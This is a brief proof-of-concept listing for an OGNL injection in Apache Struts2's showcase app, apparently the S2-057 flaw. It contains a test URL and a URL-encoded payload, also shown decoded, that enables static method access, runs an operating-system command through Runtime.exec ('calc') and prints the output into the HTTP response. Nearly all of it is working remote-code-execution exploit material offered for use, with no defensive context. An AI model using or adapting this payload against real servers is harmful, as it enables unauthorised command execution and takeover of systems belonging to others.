PoC1: http://www.canyouseeme.cc:8080/struts2-showcase/${(111+111)}/actionChain1.action PoC2: http://www.canyouseeme.cc:8080/struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain1.action Payload code: ${ ( #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(), #b=new java.io.InputStreamReader(#a), #c=new java.io.BufferedReader(#b), #d=new char[51020], #c.read(#d), #jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(), #jas502n.println(#d), #jas502n.close()) } More here: https://github.com/jas502n/St2-057